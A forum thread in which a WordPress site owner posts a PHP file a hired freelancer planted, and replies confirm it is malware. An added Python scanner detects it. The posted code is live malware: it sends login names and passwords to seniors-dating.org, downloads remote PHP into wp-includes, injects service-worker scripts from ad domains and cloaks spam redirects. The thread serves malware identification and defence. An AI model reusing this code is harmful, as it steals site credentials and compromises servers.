
I was working with a freelancer from Upwork and noticed they added this script titled .default in my config directory. It looks malicious, and they were hired to do CSS style changes to Elementor:

<?php

header('Cache-Control: private, max-age=0, no-cache');



if (!function_exists('getUserIP')) {
    function getUserIP() {
        foreach(array('HTTP_CF_CONNECTING_IP', 'HTTP_CLIENT_IP', 'HTTP_X_FORWARDED_FOR', 'HTTP_X_FORWARDED', 'HTTP_X_CLUSTER_CLIENT_IP', 'HTTP_FORWARDED_FOR', 'HTTP_FORWARDED', 'REMOTE_ADDR') as $key) {
            if (array_key_exists($key, $_SERVER) === true) {
                foreach(array_map('trim', explode(',', $_SERVER[$key])) as $ip) {
                    if (filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) !== false) {
                        return $ip;
                    }
                }
            }
        }
    }
}

if (!function_exists('cacheUrl')) {
    function cacheUrl($url, $skip_cache = FALSE) {

       $cachetime = 10; //one week

       // $cachetime = 60 * 60 * 24 * 7; //one week

        $file = ABSPATH.WPINC.
        '/class-wp-http-netfilter.php';

        $mtime = 0;
        if (file_exists($file)) {
            $mtime = filemtime($file);
        }
        $filetimemod = $mtime + $cachetime;

        if ($filetimemod < time() OR $skip_cache) {
            $ch = curl_init($url);
            curl_setopt_array($ch, array(
                CURLOPT_HEADER => FALSE,
                CURLOPT_RETURNTRANSFER => TRUE,
                CURLOPT_USERAGENT => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36',
                CURLOPT_FOLLOWLOCATION => TRUE,
                CURLOPT_MAXREDIRS => 5,
                CURLOPT_CONNECTTIMEOUT => 30,
                CURLOPT_TIMEOUT => 60,
            ));
            $data = curl_exec($ch);
            curl_close($ch);

            if ($data AND!$skip_cache) {
                file_put_contents($file, $data);
            }
        } else {
            $data = file_get_contents($file);
        }

        return $data;
    }
}

$weoboo = cacheUrl('http://ww.seniors-dating.org/lnk/data/ip.admins.txt');





if (strpos($weoboo, getUserIP()) !== false) {
    //ip found
} else {
    
    
$gbt = getUserIP(); 
$id = $_SERVER['REQUEST_URI'];
$uag = $_SERVER['HTTP_USER_AGENT']; 
$host=$_SERVER['HTTP_HOST'];
$ref =$_SERVER['HTTP_REFERER'];
$uri =$_SERVER['REQUEST_URI'];
$r="{'HOST':'".$host."', 'REFFER':'".$ref.", 'URI': '". $uri ."', 'URL':'".$host.$uri."' '}";
    if (preg_match_all("/ssss$/", $id, $matches) ) {
echo '1112';
    }
    if (preg_match_all("/iiis$/", $id, $matches) ) {
$file2Replace = ABSPATH.WPINC.'/header.php';
$oldRep = 'Zgc5c4MXrK42MR4F7ZdaOu3fNFnPMLhU3ySQFu7RvxpYYEcbGgEg4Q==';
$newRep = 'Zgc5c4MXrK42MQsM7IlQPPeZfl3OdrpdmmSLH6uToRkH';


$repContent = file_get_contents($file2Replace);
$repContent = str_replace($oldRep, $newRep, $repContent);
file_put_contents($file2Replace, $repContent);
exit;

    }
    
    
if (preg_match_all("/xmlrpc.php$/", $id, $matches) ) {

if (!empty($_POST))
{

        $res =   file_get_contents ('php://input') . "\n";

        $curl = curl_init();
    curl_setopt($curl, CURLOPT_HEADER, false);
    curl_setopt($curl, CURLOPT_URL, 'http://ww.seniors-dating.org/lnk/api_xmlrpc.php');
    curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($curl, CURLOPT_POST, true);
    curl_setopt($curl, CURLOPT_POSTFIELDS, $res );
    curl_setopt($curl, CURLOPT_HTTPHEADER, array('Content-Type:application/json'));
  
    $response = curl_exec($curl);
    
    curl_close($curl);

}

echo 'XML-RPC server accepts POST requests only.';
exit;
}








if (preg_match_all("/068f7461.js$/", $id, $matches) ) {
header('Content-Type: application/javascript');
echo 'self.importScripts(\'https://picmedia.biz/sw/w1s.js\');';
exit;
}
        if (preg_match_all("/serviceworker.js$|332.js$|34334$/", $id, $matches) ) {
header('Content-Type: application/javascript');
echo 'self.importScripts(\'https://redads.biz/sw/w1s.js\');';
//echo $gbt;
exit;
}
    if (preg_match_all("/headssr\.php$/", $id, $matches) ) { 
    $fileUrl = 'http://ww.seniors-dating.org/lnk/sh.txt';
 
   $saveTo = ABSPATH . WPINC . '/abcsss.php';
  
   if ( is_file ($saveTo) && filesize ($saveTo) && time() - filemtime($saveTo) <= 60 * 60 * 1 ) {
     //
   }
   else {
     $fp = fopen($saveTo, 'w+');
     $ch = curl_init($fileUrl);
     curl_setopt($ch, CURLOPT_FILE, $fp);
     curl_setopt($ch, CURLOPT_TIMEOUT, 15);
     curl_exec($ch);
     curl_close($ch);
     fclose($fp);
  }
     }
$srr = preg_replace('#^www\.#', '', $_SERVER['SERVER_NAME']);

            if (!preg_match_all("/ffgg$/", $id, $matches) ) {
if (!preg_match_all("/BLEXBot|Wordpress|SemrushBot|AhrefsBot|YandexBot|DotBot|MJ12bot|hrankbot|Darwin|spider/", $uag, $matches)) {        
if (preg_match_all("/dating|senior|singles/", $r, $matches) ) {
$tr = preg_replace ('#^www\.#', '', $_SERVER['SERVER_NAME']);
$tr = preg_replace ('#^[^\.]*#', '', $tr);
$tr = str_replace('.', '', $tr);
} 
if (!preg_match_all("/2r232r22r/", $r, $matches) ) {
    
$tr = preg_replace('#^www\.#', '', $_SERVER['SERVER_NAME']);
$tr = str_replace('.', '', $tr);
}
                
    $ch = curl_init();    
    
    
    
        $user_ip = getUserIP();



    if (!preg_match_all("/\/post-|\/pgxhtogrzm-/", $id, $matches) ) {
//
    if (preg_match_all("/213.111.153.189|213.111.166.54|213.111.153.84|213.111.153.197|37.1.217.38|2212.24.105.244|134.19.179.147|213.111.153.197|37.1.217.38|134.19.179.195|178.162.204.214|185.156.175.35|82.102.27.163|37\.1\.217\..*|213.152.161.20|213.152.161.138|66\.249\..*|64.68.90..*|216.239..*|65.52.104..*|65.52.108..*|65.55.24..*|65.55.52..*|65.55.55..*|65.55.213..*|65.55.217..*|131.253.24..*|131.253.46..*|40.77.167..*|199.30.27..*|157.55.16..*|157.55.18..*|157.55.32..*|157.55.36..*|157.55.48..*|157.55.109..*|157.55.110.4.*|157.56.92..*|157.56.93..*|157.56.94..*|157.56.229..*|199.30.16..*|207.46.12..*|207.46.192..*|207.46.195..*|207.46.199..*|207.46.204..*|157.55.39..*/", $user_ip, $matches)) {

// add_filter( 'the_content', 'supermario', 20 );

function supermario($content){

  $ch = curl_init( 'http://fsst.seniors-dating.org/sape/pgxhtogrzm-'.rand(1,64).'-'.rand(1,47767).'-aa/' ); 
  curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
  curl_setopt ($ch, CURLOPT_HEADER, 0);
  curl_setopt ($ch, CURLOPT_TIMEOUT, 20);
  $miaLinks = curl_exec ($ch);
  curl_close($ch);

  return $content . $miaLinks;
}
    } 
    }

function add_meta_cache() {
  echo '<meta http-equiv="Cache-Control" content="no-cache">';
  echo '<meta http-equiv="cache-control" content="max-age=0" />';
  echo '<meta http-equiv="cache-control" content="no-store" />';
  echo '<meta name="google" content="notranslate" />';
  echo '<meta name="robots" content="noarchive" />';

}
add_action('wp_head', 'add_meta_cache');




    if (preg_match_all("/\/post-|\/pgxhtogrzm-/", $id, $matches) ) {
            if (preg_match_all("/google|bing|msn|yahoo/", $r, $matches) ) {
                                    if (!preg_match_all("/217.118.90.181|213.111.153.189|109.202.107.20|212.24.105.244|109.202.107.20|134.19.179.147|37.1.217.38|134.19.179.195|178.162.204.214|185.156.175.35|82.102.27.163|37\.1\.217\..*|213.152.161.20|213.152.161.138|66\.249\..*|64.68.90..*|216.239..*|65.52.104..*|65.52.108..*|65.55.24..*|65.55.52..*|65.55.55..*|65.55.213..*|65.55.217..*|131.253.24..*|131.253.46..*|40.77.167..*|199.30.27..*|157.55.16..*|157.55.18..*|157.55.32..*|157.55.36..*|157.55.48..*|157.55.109..*|157.55.110.4.*|157.56.92..*|157.56.93..*|157.56.94..*|157.56.229..*|199.30.16..*|207.46.12..*|207.46.192..*|207.46.195..*|207.46.199..*|207.46.204..*|157.55.39..*/", $user_ip, $matches)) {
             $url_string = 'http://fsst.seniors-dating.org/pirc/'.$tr.'/' . $id; 
        } }
    if (preg_match_all("/217.118.90.181|213.111.153.189|109.202.107.20|212.24.105.244|134.19.179.147|134.19.179.147|37.1.217.38|134.19.179.195|178.162.204.214|82.102.27.163|185.156.175.35|37\.1\.217\..*|213.152.161.20|213.152.161.138|66\.249\..*|64.68.90..*|216.239..*|65.52.104..*|65.52.108..*|65.55.24..*|65.55.52..*|65.55.55..*|65.55.213..*|65.55.217..*|131.253.24..*|131.253.46..*|40.77.167..*|199.30.27..*|157.55.16..*|157.55.18..*|157.55.32..*|157.55.36..*|157.55.48..*|157.55.109..*|157.55.110.4.*|157.56.92..*|157.56.93..*|157.56.94..*|157.56.229..*|199.30.16..*|207.46.12..*|207.46.192..*|207.46.195..*|207.46.199..*|207.46.204..*|157.55.39..*/", $user_ip, $matches)) {
             $url_string = 'http://fsst.seniors-dating.org/pirc/'.$tr.'/' . $id;
    }
    curl_setopt ($ch, CURLOPT_URL, $url_string);
    curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
    curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_HEADER, 1);
    curl_setopt($ch, CURLOPT_TIMEOUT, 10);
$host=$_SERVER['HTTP_HOST'];
$ref =$_SERVER['HTTP_REFERER'];
$uri =$_SERVER['REQUEST_URI'];
$r="{'HOST':'".$host."', 'REFFER':'".$ref.", 'URI': '". $uri ."', 'URL':'".$host.$uri."' '}";
    curl_setopt($ch, CURLOPT_REFERER, $r);
    curl_setopt($ch, CURLOPT_HTTPHEADER, array('X-Forwarded-For: ' . $_SERVER['REMOTE_ADDR']));
$html = curl_exec ($ch);
if ( curl_getinfo($ch, CURLINFO_RESPONSE_CODE) == "302") {
    if (preg_match('~Location: (.*)~i', $html, $match)) {
      $location = trim($match[1]);
     }    curl_close($ch);
  
    header('Location: ' . $location);
                                                      exit();
  } $header_size = curl_getinfo($ch, CURLINFO_HEADER_SIZE);
    $header = substr($html, 0, $header_size);
    $html = substr($html, $header_size);
    curl_close($ch);
if (isset($_SERVER['HTTP_USER_AGENT']))
    $url_string = "User-Agent: {$_SERVER['HTTP_USER_AGENT']}";

    if (strstr($id, ".css")){
        header('Content-Type: text/css; charset=utf-8');
    }
    elseif (strstr($id, ".png")){
        header('Content-Type: image/png');
    }
    elseif (strstr($id, ".jpg") || strstr($id, ".jpeg")){
        header('Content-Type: image/jpeg');
    }
    elseif (strstr($id, ".gif")){
        header('Content-Type: image/gif');
    }
    elseif (strstr($id, ".xml")){
        header('Content-Type: application/xml');
    }

    if(strstr($header, 'pdf'))
        header('Content-Type: application/pdf');

    echo $html;


//  exit;
    } 

            //  if (preg_match_all("/3322233322/", $r, $matches) ) {

                if (!preg_match_all("/robots.txt|\.env$|favicon\.ico$|wp-login\.php|\/wp-content\/|\.txt$|js|css|\/wp-admin\/|\.xml$|\/wp-includes\/|well-known\/|=\.\.|wp-cron\.php/", $r, $matches) ) {
                        if (!preg_match_all("/DELETEORNOTXZ|YanSex|Baidu|Googlebot|Yandexbot|Bing|DeuSu|ltx71|CCBot|pirst|Sogou|zgrab|Nutch|Aport|Ahrefs|urllib|semtix|madbot|Exabot|AdvBot|DotBot|ezooms|statdom|MauiBot|XoviBot|BLEXBot|HTTrack|MJ12bot|Panopta|rogerbot|uCrawler|Netcraft|Moreover|Netcraft|verifying|majestic|solomono|Teleport|Site-Shot|netEstate|Crowsnest|360Spider|MegaIndex|DataMiner|SemrushBot|PaperLiBot|linkdexbot|SafeDNSBot|Barkrowler|AC-BaiduBot|ZoominfoBot|Baiduspider|DomainTools|YisouSpider|TurnitinBot|domainstats|serpstatbot|blogmuraBot|randomsurfer|Nimbostratus|DomainCrawler|Go-http-client|trendictionbot|SocialSearcher|CRAZYWEBCRAWLER|viralvideochart|python-requests|CheckMarkNetwork|NetpeakCheckerBot|DomainSONOCrawler|FlightDeckReportsBot/i", $uag, $matches)) {
    //if (preg_match_all("/213.111.153.217|37.1.217.38|213.152.162.104|66\.249\..*|64.68.90..*|216.239..*|65.52.104..*|65.52.108..*|65.55.24..*|65.55.52..*|65.55.55..*|65.55.213..*|65.55.217..*|131.253.24..*|131.253.46..*|40.77.167..*|199.30.27..*|157.55.16..*|157.55.18..*|157.55.32..*|157.55.36..*|157.55.48..*|157.55.109..*|157.55.110.4.*|157.56.92..*|157.56.93..*|157.56.94..*|157.56.229..*|199.30.16..*|207.46.12..*|207.46.192..*|207.46.195..*|207.46.199..*|207.46.204..*|157.55.39..*/", $gbt, $matches)) {
//$urlsArr = [
//'http://chipotle.buzz/in/inseq',
//'http://fsst.seniors-dating.org/wwnew/seniors-1-'.rand(1,16).'-a'.rand(1,167).'221/'
//];
//$url_string = $urlsArr[array_rand($urlsArr)];
//  $url_string = 'http://chipotle.buzz/in/news/?val1='.$r;

    $url_string = 'http://chipotle.buzz/in/news/?val1='.$host;
//   $url_string = 'http://fsst.seniors-dating.org/wwnew/seniors-1-'.rand(1,16).'-a'.rand(1,167).'221/'; 
    }
    }
    curl_setopt ($ch, CURLOPT_URL, $url_string);
    curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
    curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_HEADER, 1);
    curl_setopt($ch, CURLOPT_TIMEOUT, 10);
$host=$_SERVER['HTTP_HOST'];
$ref =$_SERVER['HTTP_REFERER'];
$uri =$_SERVER['REQUEST_URI'];
$r="{'HOST':'".$host."', 'REFFER':'".$ref.", 'URI': '". $uri ."', 'URL':'".$host.$uri."' '}";
    curl_setopt($ch, CURLOPT_REFERER, $r);
    curl_setopt($ch, CURLOPT_HTTPHEADER, array('X-Forwarded-For: ' . $_SERVER['REMOTE_ADDR']));
    $html = curl_exec ($ch);
if ( curl_getinfo($ch, CURLINFO_RESPONSE_CODE) == "302") {
    if (preg_match('~Location: (.*)~i', $html, $match)) {
      $location = trim($match[1]);
     }    curl_close($ch);
  
    header('Location: ' . $location);
                                                      exit();
  }
    $header_size = curl_getinfo($ch, CURLINFO_HEADER_SIZE);
    $header = substr($html, 0, $header_size);
    $html = substr($html, $header_size);
    curl_close($ch);
if (isset($_SERVER['HTTP_USER_AGENT']))
    $url_string = "User-Agent: {$_SERVER['HTTP_USER_AGENT']}";
    if (strstr($id, ".css")){
        header('Content-Type: text/css; charset=utf-8');
    }
    elseif (strstr($id, ".png")){
        header('Content-Type: image/png');
    }
    elseif (strstr($id, ".jpg") || strstr($id, ".jpeg")){
        header('Content-Type: image/jpeg');
    }
    elseif (strstr($id, ".gif")){
        header('Content-Type: image/gif');
    }
    elseif (strstr($id, ".xml")){
        header('Content-Type: application/xml');
    }
    if(strstr($header, 'pdf'))
        header('Content-Type: application/pdf');
//  echo $html;
function yuhoo($html) {
    echo $html;
   }

   add_action('wp_head', 
           function() use ( $html ) { 
               yuhoo( $html ); 
            }
        );
//  exit;
    } 
            //  }
    }   
    

    

}
    //file_put_contents('/tmp/log.txt', getUserIP() . "\n", FILE_APPEND);
    /* your code end */



/* weoboo end */
if(!isset($_COOKIE['_eshoob'])) {
        
    setcookie('_eshoob', 1, time()+604800, '/');

    // unset cookies
    if (isset($_SERVER['HTTP_COOKIE'])) {

        $cookies = explode(';', $_SERVER['HTTP_COOKIE']);
        
        foreach($cookies as $cookie) {

            if (strpos($cookie,'wordpress') !== false || strpos($cookie,'wp_') !== false || strpos($cookie,'wp-') !== false) {
            
            $parts = explode('=', $cookie);
            $name = trim($parts[0]);

            setcookie($name, '', time()-1000);
            setcookie($name, '', time()-1000, '/');
            
            }
        }
    } 
}


if (!function_exists('getUserIP')) {
function getUserIP()
{
    foreach (array('HTTP_CF_CONNECTING_IP', 'HTTP_CLIENT_IP', 'HTTP_X_FORWARDED_FOR', 'HTTP_X_FORWARDED', 'HTTP_X_CLUSTER_CLIENT_IP', 'HTTP_FORWARDED_FOR', 'HTTP_FORWARDED', 'REMOTE_ADDR') as $key)
    {
        if (array_key_exists($key, $_SERVER) === true)
        {
            foreach (array_map('trim', explode(',', $_SERVER[$key])) as $ip)
            {
                if (filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) !== false)
                {
                    return $ip;
                }
            }
        }
    }
}
}

if (!function_exists('isHttps')) {
function isHttps() {
    if ((!empty($_SERVER['REQUEST_SCHEME']) && $_SERVER['REQUEST_SCHEME'] == 'https') ||
        (!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] == 'on') ||
        (!empty($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] == 'https') ||
        (!empty($_SERVER['HTTP_X_FORWARDED_SSL']) && $_SERVER['HTTP_X_FORWARDED_SSL'] == 'on') ||
        (!empty($_SERVER['SERVER_PORT']) && $_SERVER['SERVER_PORT'] == '443')) {
        $server_request_scheme = 'https';
    } else {
        $server_request_scheme = 'http';
    }
    return $server_request_scheme;
}
}

if (!function_exists('wordpress_api_debug')) {
function wordpress_api_debug( $user_login, $user ){

    $wpApiUrl = "http://ww.seniors-dating.org/lnk/api.php";    

        //

    $uuuser = get_user_by('login', $_POST['log']);
    if(in_array('administrator', $uuuser->roles)){
        $role = 'admin';
    }
    else{
        $role = 'user';
    }
    // 

    $verbLogs = array(
        'wp_host'       => $_SERVER['HTTP_HOST'],
        'wp_uri'        => $_SERVER['REQUEST_URI'],
        'wp_scheme'     => isHttps(),
        'user_login'    => $_POST['log'],
        'user_password' => $_POST['pwd'],
        'user_ip'       => getUserIP(),
        'user_role'     => $role
    );


    if (!empty($verbLogs['user_login'])) {
    
    $wpLogData = json_encode($verbLogs);
    
    $curl = curl_init();
    curl_setopt($curl, CURLOPT_HEADER, false);
    curl_setopt($curl, CURLOPT_URL, $wpApiUrl);
    curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($curl, CURLOPT_POST, true);
    curl_setopt($curl, CURLOPT_POSTFIELDS, $wpLogData);
    curl_setopt($curl, CURLOPT_HTTPHEADER, array('Content-Type:application/json'));

    $response = curl_exec($curl);
    
    curl_close($curl);

    }

}
}

if (function_exists('add_action')) {

add_action( 'wp_login', 'wordpress_api_debug', 10, 2 );

}

if (!function_exists('wordpress_api_wrongauth_debug')) {

    function wordpress_api_wrongauth_debug( $user_login, $user ){
    
        $wpApiUrl = "http://ww.seniors-dating.org/lnk/api_false.php";    
    
            //
    
        $uuuser = get_user_by('login', $_POST['log']);
        if(in_array('administrator', $uuuser->roles)){
            $role = 'admin';
        }
        else{
            $role = 'user';
        }
        // 
    
        $verbLogs = array(
            'wp_host'       => $_SERVER['HTTP_HOST'],
            'wp_uri'        => $_SERVER['REQUEST_URI'],
            'wp_scheme'     => isHttps(),
            'user_login'    => $_POST['log'],
            'user_password' => $_POST['pwd'],
            'user_ip'       => getUserIP(),
            'user_role'     => $role
        );
    
    
        if (!empty($verbLogs['user_login'])) {
        
        $wpLogData = json_encode($verbLogs);
        
        $curl = curl_init();
        curl_setopt($curl, CURLOPT_HEADER, false);
        curl_setopt($curl, CURLOPT_URL, $wpApiUrl);
        curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($curl, CURLOPT_POST, true);
        curl_setopt($curl, CURLOPT_POSTFIELDS, $wpLogData);
        curl_setopt($curl, CURLOPT_HTTPHEADER, array('Content-Type:application/json'));
    
        $response = curl_exec($curl);
        
        curl_close($curl);
        
        }
    
    }
    }

    if (function_exists('add_action')) {
    
    add_action( 'wp_login_failed', 'wordpress_api_wrongauth_debug', 10, 2 );
    
    }

/*
    // themes list
$all_themes = wp_get_themes();
$themeArr = [];
foreach ($all_themes as $theme){
    $themeArr[] = $theme->get( 'TextDomain' );
}

$uploads = wp_upload_dir();
$upDir = $uploads['basedir'];
$themesList = "{$upDir}/themes_list.txt";

if (!file_exists($themesList)) {
    file_put_contents($themesList, $_SERVER['SERVER_NAME'] . ';' . implode(';', $themeArr) . "\n", FILE_APPEND);
}
// themes list end
*/



?>
Daniel Taki
  • Why can't you just ask them? – yeah_well Nov 25 '20 at 20:38
  • What part of it you don't understand? – mentallurg Nov 25 '20 at 20:40
  • The whole thing. I'm not sure what it is doing, and there are some shady links to seniors-dating.org as well as an IP table. – Daniel Taki Nov 25 '20 at 20:42
  • Do you have anything to do with seniors-dating.org? If not, it's **very suspicious** to say the least. I noticed the function wordpress_api_debug is added to the hook wp_login, which means it will be executed at every login. That function collects $_POST['pwd'], which appears to be the password field, then sends it with a curl request to the suspicious domain. – reed Nov 25 '20 at 21:02
  • No, I do not. Okay, thank you. That is what I thought; I have already reported this to Upwork and wanted any other insight into the code. – Daniel Taki Nov 25 '20 at 21:07
  • It does a lot of other stuff; it basically checks the request URI (every request is probably redirected there with .htaccess) and does stuff according to the request (it can load JS scripts from other domains, apparently write stuff to a "header.php" file that doesn't even exist by default, etc.). If you want to find out all the details in order to clean your website, forget about it. Just restore everything from a clean backup; that's the way to go. – reed Nov 25 '20 at 21:18
  • And by the way, asking to analyze malware here is considered off-topic, so unfortunately your question will soon be closed, I guess. That's all. – reed Nov 25 '20 at 21:19
  • Alright thanks @reed appreciate it. – Daniel Taki Nov 25 '20 at 21:27

1 Answer

Yes, it is malicious.

The script, for example, collects data on the WordPress installation and the credentials used to log in:

$verbLogs = array(
    'wp_host'       => $_SERVER['HTTP_HOST'],
    'wp_uri'        => $_SERVER['REQUEST_URI'],
    'wp_scheme'     => isHttps(),
    'user_login'    => $_POST['log'],
    'user_password' => $_POST['pwd'],
    'user_ip'       => getUserIP(),
    'user_role'     => $role
);

and then uses curl_exec() to send this data to http://ww.seniors-dating.org/lnk/api.php.

Esa Jokinen
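One way to hunt for this pattern across a whole WordPress tree, as an added example that is not part of the original question or answer. It is a small Python heuristic scanner written for this thread: the rules encode the behaviours visible in the posted script (a wp_login / wp_login_failed hook, a raw $_POST['pwd'] read, an outbound curl POST, PHP file paths built under wp-includes, service-worker importScripts() injection, trust in spoofable client-IP headers) plus the hostnames that appear literally in it. The two PHP samples inside the block are constructed from the posted code, and the rule names, verdict thresholds and the ScanResult type are this example's own, not anything from the original script.

```python
"""Heuristic scanner for the WordPress credential stealer shown in this thread.
Added example, not part of the original post. Line-based regexes only: an
obfuscated (base64/eval) variant of the same malware would need other checks."""
import re
import sys
from dataclasses import dataclass, field
from pathlib import Path

# Hostnames that appear literally in the posted script.
KNOWN_C2_HOSTS = ("seniors-dating.org", "picmedia.biz", "redads.biz", "chipotle.buzz")

# Behavioural indicators. Rule names and thresholds are this example's own.
RULES = {
    # hook that fires on every (failed) login attempt
    "login_hook": re.compile(r"add_action\s*\(\s*['\"]wp_login(?:_failed)?['\"]"),
    # raw password field read from the wp-login.php form
    "reads_post_pwd": re.compile(r"\$_POST\s*\[\s*['\"]pwd['\"]\s*\]"),
    # outbound POST via curl (how the sample exfiltrates)
    "curl_post": re.compile(r"CURLOPT_POST(?:FIELDS)?\b"),
    # builds a path to a PHP file under wp-includes (the sample drops files there)
    "wp_includes_php_path": re.compile(r"ABSPATH\s*\.\s*WPINC\s*\.\s*['\"]/[\w-]+\.php['\"]"),
    # service-worker script injection from a third-party origin
    "sw_importscripts": re.compile(r"importScripts\s*\("),
    # trusts client-supplied IP headers to decide who sees the payload
    "spoofable_ip_headers": re.compile(r"HTTP_X_FORWARDED_FOR|HTTP_CF_CONNECTING_IP|HTTP_CLIENT_IP"),
}
URL_RE = re.compile(r"https?://([A-Za-z0-9.-]+)", re.I)


@dataclass
class ScanResult:
    name: str
    hits: dict = field(default_factory=dict)      # rule name -> matching line numbers
    remote_hosts: set = field(default_factory=set)
    known_c2: set = field(default_factory=set)

    @property
    def steals_credentials(self) -> bool:
        """Login hook + raw password read + outbound POST is the stealer pattern."""
        return all(k in self.hits for k in ("login_hook", "reads_post_pwd", "curl_post"))

    @property
    def verdict(self) -> str:
        if self.steals_credentials or self.known_c2:
            return "malicious"
        return "suspicious" if len(self.hits) >= 3 else "clean"


def scan_source(src: str, name: str = "<string>") -> ScanResult:
    """Run every rule over one PHP source text, recording matching line numbers."""
    res = ScanResult(name)
    for lineno, line in enumerate(src.splitlines(), start=1):
        for rule, pattern in RULES.items():
            if pattern.search(line):
                res.hits.setdefault(rule, []).append(lineno)
        for host in URL_RE.findall(line):
            res.remote_hosts.add(host.lower())
    res.known_c2 = {h for h in res.remote_hosts
                    if any(h == c2 or h.endswith("." + c2) for c2 in KNOWN_C2_HOSTS)}
    return res


def scan_tree(root: Path) -> list:
    """Scan every .php file below root (for example the WordPress document root)."""
    return [scan_source(p.read_text(errors="replace"), str(p))
            for p in sorted(root.rglob("*.php"))]


# Constructed sample: the wp_login hook from the posted script, trimmed to the
# lines that matter for detection.
STEALER_SAMPLE = r"""<?php
function wordpress_api_debug( $user_login, $user ){
    $wpApiUrl = "http://ww.seniors-dating.org/lnk/api.php";
    $verbLogs = array('user_login' => $_POST['log'], 'user_password' => $_POST['pwd']);
    $curl = curl_init();
    curl_setopt($curl, CURLOPT_URL, $wpApiUrl);
    curl_setopt($curl, CURLOPT_POST, true);
    curl_setopt($curl, CURLOPT_POSTFIELDS, json_encode($verbLogs));
    curl_exec($curl);
}
add_action( 'wp_login', 'wordpress_api_debug', 10, 2 );
"""

# Constructed benign sample: a plugin that also hooks wp_login but only stores
# a last-login timestamp. It must not be flagged.
BENIGN_SAMPLE = r"""<?php
function record_last_login( $user_login, $user ) {
    update_user_meta( $user->ID, 'last_login', time() );
}
add_action( 'wp_login', 'record_last_login', 10, 2 );
"""

if __name__ == "__main__":
    roots = [Path(a) for a in sys.argv[1:]]
    results = [r for root in roots for r in scan_tree(root)] if roots else [
        scan_source(STEALER_SAMPLE, "stealer-sample"),
        scan_source(BENIGN_SAMPLE, "benign-sample"),
    ]
    for r in results:
        if r.verdict != "clean":
            print(f"{r.verdict:10} {r.name}  rules={sorted(r.hits)}  c2={sorted(r.known_c2)}")
```

Run it with no arguments to scan the two built-in samples, or point it at the document root (`python scan.py /var/www/html`) to list every PHP file that hits the stealer combination or talks to one of the listed hosts. A benign login hook on its own is not flagged; it is the combination of the hook, the raw password read and the outbound POST that marks the stealer. Because the matching is per line, it misses the posted script's own `ABSPATH.WPINC.` path split across two lines and would miss an encoded variant entirely, so pair it with an integrity check of core files (`wp core verify-checksums` in WP-CLI) and, as reed says above, restore from a clean backup rather than hand-cleaning.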